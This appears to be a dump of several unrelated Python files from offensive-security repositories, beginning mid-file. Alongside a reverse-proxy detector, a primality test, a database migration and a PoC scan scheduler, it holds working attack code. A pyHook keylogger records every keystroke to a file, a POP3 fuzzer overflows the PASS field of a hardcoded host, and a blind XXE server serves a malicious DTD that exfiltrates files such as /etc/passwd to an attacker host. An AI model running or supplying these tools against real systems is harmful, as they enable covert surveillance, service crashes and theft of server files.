"X-Forwarded-For: (.*)",
]
for p_name in wanted_patterns:
# Case insensitive search
p_value = re.search(p_name, str(data), re.IGNORECASE)
if p_value != None:
# Only the 1st group, without newlines
value = p_value.groups()[0].strip("\r\n")
if verbosity:
zprint(value, p_name)
# Add it to the global structure if needed
if p_name == "<title>(.*)</title>":
global_data["Title"][hop] = value
if p_name == "<address>(.*)</address>":
global_data["Address"][hop] = value
# Some heuristics
if re.search("X-Forwarded-For:", p_name):
global_data["X-Fwd"][hop] = value
if method == "TRACE":
zprint(
'"X-Forwarded-For" in body when using TRACE : Probably a reverse proxy',
"++",
)
inc_score()
# Analyse the data returned by urllib2.*open()
def debug_and_parse(data):
# Get data
headers = data.info()
body = data.read()
# Debug
if verbosity == 2:
zprint(str(headers), "DEBUG HEADERS")
zprint(str(body), "DEBUG BODY")
# Extract some interesting info
codes = server.BaseHTTPRequestHandler.responses
global_data["StatusCode"][hop] = str(data.code) + " " + codes[data.code][0]
analyse_headers(headers)
analyse_body(body)
############## SCAN ###################################
# Init
getArguments()
# Current target
url = scheme + "://" + host + ":" + port + path
zprint("Target URL : " + url)
zprint("Used method : " + method)
zprint("Max number of hops : " + str(max_fwds))
# Scan
for hop in range(0, max_fwds):
# Create the request object
request = Request(url)
request.get_method = lambda: method
request.data = body_content
request.add_header("Content-Type", contentType)
request.add_header("User-agent", userAgent)
# Add the 'Max-Forwards' header
request.add_header("Max-Forwards", hop)
if verbosity:
print("-" * 80)
zprint(
'Current value of "Max-Forwards" = ' + str(hop) + " [" + "-" * 20 + "]",
"-" * 19,
)
print("-" * 80)
try:
# Do the HTTP request
opener = build_opener(HTTPHandler)
result = opener.open(request)
# Found something
if verbosity:
zprint("Status Code => HTTP 200: OK", "**")
# Analyse it
debug_and_parse(result)
# Not a 200 OK
except HTTPError as e:
if verbosity:
zprint("Status Code => " + str(e), "**")
# Some heuristics
if e.code == 502:
zprint("HTTP 502 : Probably a reverse proxy", "++")
inc_score()
if e.code == 483:
zprint("HTTP 483 : Probably a reverse proxy (SIP ?)", "++")
inc_score()
# Analyse it
debug_and_parse(e)
# Network problem
except URLError as e:
zprint("Network problem !", "!!")
zprint("Reason : " + str(e.reason), "!!")
break
############## REPORT ###################################
print("-" * 80)
zprint("Heuristic Report [" + "-" * 31 + "]", "-" * 27)
print("-" * 80)
# For each key
for k in list(global_data.keys()):
string = k + ":\n"
previous = "Undef"
# For each hop
ok = 0
for i in range(0, max_fwds):
# Try this key
try:
current = global_data[k][i]
# We got a value !
ok = 1
except KeyError:
current = "Undef"
# Some heuristics
if previous != current and i > 0:
inc_score()
# Then add it to the current string
string = string + "\tHop #" + str(i) + " : " + current + "\n"
previous = current
# Display this key only if values were found
if ok:
print(string)
# Final score
if score == 0:
zprint("No reverse proxy", "--")
else:
zprint("Found a reverse proxy, score is " + str(score), "++")
| 25.374663 | 98 | 0.518704 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# pyHook download link
# http://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/
# pythoncom download link
# http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
# Keylogger
import pythoncom, pyHook
#Again, once the user hits any keyboard button, the keypressed function will be executed and that action will be stored in event
def keypressed(event):
global store
    #Enter and backspace are not handled properly, that's why we hardcode their values to < Enter > and <BACK SPACE>
    # note that we can tell whether the user input was enter or backspace based on their ASCII values
if event.Ascii==13:
keys=' < Enter > '
elif event.Ascii==8:
keys=' <BACK SPACE> '
else:
keys=chr(event.Ascii)
store = store + keys #at the end we append the ascii keys into store variable and finally write them in keylogs text file
fp=open("keylogs.txt","w")
fp.write(store)
fp.close()
return True # after intercetping the keyboard we have to return a True value otherwise we will simply disable the keyboard functionality
store = '' # string where we will store all the pressed keys
#Next we create and register a hook manager; once the user hits any keyboard button, the keypressed
#function will be executed and that action will be stored in event
obj = pyHook.HookManager()
obj.KeyDown = keypressed
obj.HookKeyboard() #start the hooking loop and pump out the messages
pythoncom.PumpMessages() #remember that per Pyhook documentation we must have a Windows message pump
| 27.035088 | 140 | 0.717595 |
cybersecurity-penetration-testing | # Primality Testing with the Rabin-Miller Algorithm
# http://inventwithpython.com/hacking (BSD Licensed)
import random
def rabinMiller(num):
# Returns True if num is a prime number.
s = num - 1
t = 0
while s % 2 == 0:
# keep halving s until it is even (and use t
# to count how many times we halve s)
s = s // 2
t += 1
for trials in range(5): # try to falsify num's primality 5 times
a = random.randrange(2, num - 1)
v = pow(a, s, num)
if v != 1: # this test does not apply if v is 1.
i = 0
while v != (num - 1):
if i == t - 1:
return False
else:
i = i + 1
v = (v ** 2) % num
return True
def isPrime(num):
# Return True if num is a prime number. This function does a quicker
# prime number check before calling rabinMiller().
if (num < 2):
return False # 0, 1, and negative numbers are not prime
# About 1/3 of the time we can quickly determine if num is not prime
# by dividing by the first few dozen prime numbers. This is quicker
# than rabinMiller(), but unlike rabinMiller() is not guaranteed to
# prove that a number is prime.
lowPrimes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997]
if num in lowPrimes:
return True
# See if any of the low prime numbers can divide num
for prime in lowPrimes:
if (num % prime == 0):
return False
# If all else fails, call rabinMiller() to determine if num is a prime.
return rabinMiller(num)
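
# Quick sanity check (a sketch, not part of the original routine):
#   isPrime(101)  -> True   (101 is in the lowPrimes shortcut list)
#   isPrime(221)  -> False  (221 = 13 * 17, caught by the trial-division loop)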
def generateLargePrime(keysize=1024):
# Return a random prime number of keysize bits in size.
while True:
num = random.randrange(2**(keysize-1), 2**(keysize))
if isPrime(num):
return num | 42.241935 | 828 | 0.566791 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Project.auth_parameters'
db.add_column(u'xtreme_server_project', 'auth_parameters',
self.gf('django.db.models.fields.TextField')(default='Not Set'),
keep_default=False)
# Adding field 'Project.auth_mode'
db.add_column(u'xtreme_server_project', 'auth_mode',
self.gf('django.db.models.fields.TextField')(default='Not Set'),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Project.auth_parameters'
db.delete_column(u'xtreme_server_project', 'auth_parameters')
# Deleting field 'Project.auth_mode'
db.delete_column(u'xtreme_server_project', 'auth_mode')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'auth_parameters': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 63.678261 | 130 | 0.53933 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
string="""Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds"""
if 1:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.158',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
data=s.recv(1024)
print str(data)
print "done"
#s.send('QUIT\r\n')
#s.close()
| 125.074074 | 2,915 | 0.937114 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Simple Blind XXE server intended to handle incoming requests for
# malicious DTD file, that will subsequently ask for locally stored file,
# like file:///etc/passwd.
#
# This program has been tested with PlayFramework 2.1.3 XXE vulnerability,
# to be run as follows:
#
# 0. Configure global variables: SERVER_SOCKET and RHOST
#
# 1. Run the below script, using:
# $ python blindxxe.py [options] <filepath>
#
# where <filepath> can be for instance: "file:///etc/passwd"
#
# 2. Then, while server is running - invoke XXE by requesting e.g.
# $ curl -X POST http://vulnerable/app --data-binary \
# $'<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://attacker/test.dtd"><foo>&exfil;</foo>'
#
# The expected result will be like the following:
#
# $ python blindxxe.py
# Exfiltrated file:///etc/passwd:
# ------------------------------
# root:x:0:0:root:/root:/bin/sh
# nobody:x:65534:65534:nobody:/nonexistent:/bin/false
# user:x:1000:50:Linux User,,,:/home/user:/bin/sh
# play:x:100:65534:Linux User,,,:/var/www/play/:/bin/false
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
#
#
# Mariusz Banach, 2016
#
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urllib
import re
import sys
import time
import socket
import argparse
import threading
#
# CONFIGURE THE BELOW VARIABLES
#
config = {
'debug' : '',
'listen' : '0.0.0.0',
'port' : 8080,
'rhost' : '',
'exfil-file' : '',
}
EXFILTRATED_EVENT = threading.Event()
def dbg(x):
if config['debug']:
print('[dbg] {}'.format(x))
class BlindXXEServer(BaseHTTPRequestHandler):
method = ''
def response(self, **data):
code = data.get('code', 200)
content_type = data.get('content_type', 'text/plain')
body = data.get('body', '')
self.send_response(code)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write(body.encode('utf-8'))
self.wfile.close()
def do_GET(self):
self.method = 'GET'
self.request_handler(self)
def do_POST(self):
self.method = 'POST'
self.request_handler(self)
def log_message(self, format, *args):
return
def request_handler(self, request):
global EXFILTRATED_EVENT
print('[.] Incoming HTTP request from {}: {} {}'.format(
self.client_address[0],
request.method,
request.path[:25]
))
path = urllib.unquote(request.path).decode('utf8')
m = re.search('\/\?exfil=(.*)', path, re.MULTILINE)
if m and request.command.lower() == 'get':
data = path[len('/?exfil='):]
print('\n[+] Exfiltrated %s:' % config['exfil-file'])
print('-' * 30)
print(urllib.unquote(data).decode('utf8'))
print('-' * 30 + '\n')
self.response(body='true')
EXFILTRATED_EVENT.set()
elif request.path.endswith('.dtd'):
dbg('Sending malicious DTD file.')
dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
<!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s:%(exfil_port)d/?exfil=%%param_exfil;'>">
%%param_request;''' % {
'exfil_file' : config['exfil-file'],
'exfil_host' : config['rhost'],
'exfil_port' : config['port']
}
self.response(content_type='text/xml', body=dtd)
else:
dbg('%s %s' % (request.command, request.path))
self.response(body='false')
def parseOptions(argv):
global config
print('''
:: Blind-XXE attacker's helper backend component
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
Mariusz Banach / mgeeky '16-18, <[email protected]>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
parser.add_argument('file', type=str, metavar='FILE', default='file:///etc/passwd', help = 'Specifies file to exfiltrate using Blind XXE technique.')
parser.add_argument('-l', '--listen', default='0.0.0.0', help = 'Specifies interface address to bind the HTTP server on / listen on. Default: 0.0.0.0 (all interfaces)')
parser.add_argument('-p', '--port', metavar='PORT', default='8080', type=int, help='Specifies the port to listen on. Default: 8080')
parser.add_argument('-r', '--rhost', metavar='HOST', default=config['rhost'], help='Specifies attackers host address where the victim\'s XML parser should refer while fetching external entities')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['debug'] = args.debug
config['listen'] = args.listen
config['port'] = int(args.port)
config['rhost'] = args.rhost
config['exfil-file'] = args.file
print('[::] File to be exfiltrated: "{}"'.format(args.file))
port = int(args.port)
if port < 1 or port > 65535:
Logger.err("Invalid port number. Must be in <1, 65535>")
sys.exit(-1)
return args
def fetchRhost():
global config
config['rhost'] = socket.gethostbyname(socket.gethostname())
def main(argv):
global config
fetchRhost()
opts = parseOptions(argv)
if not opts:
        print('[!] Options parsing failed.')
return False
print('[+] Serving HTTP server on: ("{}", {})'.format(
config['listen'], config['port']
))
dbg('RHOST set to: {}'.format(config['rhost']))
rhost = config['listen']
if config['listen'] == '0.0.0.0':
rhost = config['rhost']
print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:')
print('''
===
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{}:{}/test.dtd">
<foo>&exfil;</foo>
===
PS: Don't forget to set:
Content-Type: text/xml
'''.format(rhost, config['port']))
server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
while not EXFILTRATED_EVENT.is_set():
pass
print('[+] File has been exfiltrated. Quitting.')
if __name__ == '__main__':
main(sys.argv)
| 28.783019 | 199 | 0.606051 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-14
# @File : poc_scanner.py
# @Desc : =_=!!
import sched
import time
import datetime
from multiprocessing import Pool, Lock
from threading import RLock
from pocsuite.api.cannon import Cannon
from apscheduler.schedulers.blocking import BlockingScheduler
from bson.objectid import ObjectId
from fuxi.views.lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.lib.parse_target import parse_target
from instance import config_name
config_db = db_name_conf()['config_db']
tasks_db = db_name_conf()['tasks_db']
vul_db = db_name_conf()['vul_db']
plugin_db = db_name_conf()['plugin_db']
schedule = sched.scheduler(time.time, time.sleep)
lock = Lock()
thread_lock = RLock()
def verify_poc(scan_data):
plugin_name = scan_data['plugin_name']
plugin_filename = scan_data['plugin_filename']
target = scan_data['target']
info = {"pocname": plugin_name,
"pocstring": open(plugin_filename, 'r').read(),
"mode": 'verify'
}
try:
invoker = Cannon(target, info)
result = invoker.run()
if result[-3][0] == 1:
scan_result = {
"plugin_filename": scan_data['plugin_filename'],
"plugin_name": scan_data['plugin_name'],
"plugin_id": scan_data['plugin_id'],
"plugin_type": scan_data['plugin_type'],
"plugin_app": scan_data['plugin_app'],
"plugin_version": scan_data['plugin_version'],
"target": scan_data['target'],
"task_id": scan_data['task_id'],
"task_name": scan_data['task_name'],
"scan_result": result[-1],
"date": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"tag": ""
}
connectiondb(vul_db).insert(scan_result)
except Exception as e:
raise e
class PocsuiteScanner:
def __init__(self, task_id):
self.task_id = task_id
self.tasks_db_cursor = connectiondb(tasks_db).find_one({"_id": self.task_id})
self.target_list = parse_target(self.tasks_db_cursor['scan_target'])
self.plugin_id_list = self.tasks_db_cursor['plugin_id']
self.result_tmp = []
self.result = []
self.processes = connectiondb(config_db).find_one({"config_name": config_name})['poc_thread']
def set_scanner(self):
connectiondb(tasks_db).update_one({'_id': ObjectId(self.task_id)}, {'$set': {'task_status': 'Processing'}})
if connectiondb(vul_db).find_one({"task_id": self.task_id}):
connectiondb(vul_db).update({'task_id': self.task_id}, {"$set": {"tag": "delete"}}, multi=True)
pool_scanner = Pool(processes=self.processes)
for target in self.target_list:
for plugin_id in self.plugin_id_list:
plugin_cursor = connectiondb(plugin_db).find_one({"_id": ObjectId(plugin_id)})
scan_data = {
"plugin_filename": plugin_cursor['plugin_filename'].encode("UTF-8"),
"plugin_name": plugin_cursor['plugin_name'].encode("UTF-8"),
"plugin_id": plugin_cursor['_id'],
"plugin_type": plugin_cursor['plugin_type'],
"plugin_app": plugin_cursor['plugin_app'],
"plugin_version": plugin_cursor['plugin_version'],
"target": target,
"task_id": self.task_id,
"task_name": self.tasks_db_cursor['task_name'],
}
pool_scanner.apply_async(verify_poc, (scan_data,))
pool_scanner.close()
pool_scanner.join()
connectiondb(tasks_db).update_one({'_id': ObjectId(self.task_id)}, {
'$set': {
'task_status': 'Completed',
'end_date': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
}
})
class PoCScannerLoop:
def __init__(self):
self.recursion = ''
self.status = ''
self.task_id = ''
self.end_date = ''
def task_schedule(self):
scheduler = BlockingScheduler()
try:
scheduler.add_job(self._get_task, 'interval', seconds=30)
scheduler.start()
except Exception as e:
print(e)
def _get_task(self):
# while thread_lock:
for task_info in connectiondb(tasks_db).find():
self.recursion = int(task_info['task_recursion'])
self.task_id = task_info['_id']
self.status = task_info['task_status']
self.end_date = task_info['end_date']
if self.recursion == 0:
pass
# every day task
if self.recursion == 1:
if "Processing" in self.status:
pass
else:
start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S")
plan_time = (datetime.datetime.now() - start_date).total_seconds()
if plan_time > 60 * 60 * 24:
print("Every day recursion start......")
scanner = PocsuiteScanner(self.task_id)
scanner.set_scanner()
# every week task
elif self.recursion == 7:
if "Processing" in self.status:
pass
else:
start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S")
plan_time = (datetime.datetime.now() - start_date).total_seconds()
if plan_time > 60 * 60 * 24 * 7:
print("Every week start...")
scanner = PocsuiteScanner(self.task_id)
scanner.set_scanner()
# every month task
elif self.recursion == 30:
if "Processing" in self.status:
pass
else:
start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S")
plan_time = (datetime.datetime.now() - start_date).total_seconds()
if plan_time > 60 * 60 * 24 * 30:
print("Every month start...")
scanner = PocsuiteScanner(self.task_id)
scanner.set_scanner()
if __name__ == '__main__':
    loop_scanner = PoCScannerLoop()
    # start the recurring scheduler so recursive tasks are actually re-run
    loop_scanner.task_schedule()
| 38.490909 | 115 | 0.524021 |
